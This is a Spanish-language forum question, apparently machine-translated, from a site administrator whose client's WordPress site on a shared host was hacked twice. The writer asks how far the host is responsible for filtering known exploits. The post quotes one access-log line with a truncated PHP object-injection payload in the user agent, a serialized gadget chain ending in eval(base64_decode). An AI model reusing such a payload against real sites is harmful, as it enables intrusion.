He implementado una docena de sitios de Wordpress en los últimos 10 años en una variedad de hosts. Tengo un solo cliente en un host particular que nunca he usado antes cuyo sitio de Wordpress ha sido pirateado dos veces en el último año. La causa de la primera infracción no está clara debido a la falta de evidencia (movimiento lateral sospechoso de otro inquilino) pero parece que el atacante esta vez es externo y aprovechando la inyección de código a través de la cadena de agente de usuario (sí, en Wordpress).
GET / about-us / HTTP / 1.1 "200 23527" - ""} __ prueba | O: 21: \ "JDatabaseDriverMysqli \": 3: {s: 2: \ "fc \"; O: 17: \ "JSimplepieFactory \": 0: {} s: 21: \ "\ 0 \ 0 \ 0disconnectHandlers \"; a: 1: {i: 0; a: 2: {i: 0; O: 9: \ "SimplePie \ ": 5: {s: 8: \" sanitize \ "; O: 20: \" JDatabaseDriverMysql \ ": 0: {} s: 8: \" feed_url \ "; s: 3738: \" eval (base64_decode (' JGNoZWNrID0g ...
Después del primer incidente, reduje todo al inventario WP + akismet + cloudflare con un tema personalizado para eliminar la mayoría de las variables del lado de la aplicación. No hay otros complementos; todos los temas de stock eliminados.
Obviamente, este es un error de Wordpress / posible tema que debe solucionarse, pero más allá de la revisión de código y la aplicación de Cloudflare para tratar de eliminar a los agentes malos, debería esperar que el host sea más proactivo para filtrar las vulnerabilidades conocidas en el ¿Nivel de red o es únicamente el problema del inquilino?
¿O esto varía según el host? Basándome en su modelo de negocio, realmente, realmente, no obtengo buenas vibraciones de este en absoluto.
Suponer que abandonar el alojamiento compartido no es una opción.